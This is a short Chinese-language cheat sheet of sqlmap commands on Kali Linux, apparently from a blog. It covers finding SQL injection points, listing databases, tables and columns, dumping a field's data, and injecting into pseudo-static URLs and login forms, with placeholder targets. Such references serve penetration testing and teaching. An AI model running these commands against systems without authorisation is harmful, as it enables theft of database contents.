判断注入点:sqlmap -u url(目标地址)
爆破数据库名:
查看所有库名:sqlmap -u url --dbs
查看当前库名:sqlmap -u url --current-db
爆破数据表名:sqlmap -u url -D 数据库名 --tables
爆破字段名:sqlmap -u url -D 数据库名 -T 表名 --columns
爆破字段名下所有数据:sqlmap -u url -D 数据库名 -T 表名 -C 字段名 --dump
爬虫:sqlmap -u url --crawl 深度
对伪静态进行注入:sqlmap -u http://xxx.com/abc/1*(自己找的注入点,用*标出).html
对登陆框(表单)进行注入:sqlmap -u http://xxx.com/admin/index.php --form
测试等级: --level 等级 (共有5个等级1-5,默认为1,等级越高测试内容越多)
风险等级: --risk 等级 (共有4个等级0-3,默认为1,等级越高测试语句越多)
详细信息: -v 等级 (共有7个等级0-6,默认为1,等级越高越详细)
清除缓存: --flush-session
自动选择大写选项: --batch
kali下sqlmap的指令
最新推荐文章于 2024-05-12 05:37:14 发布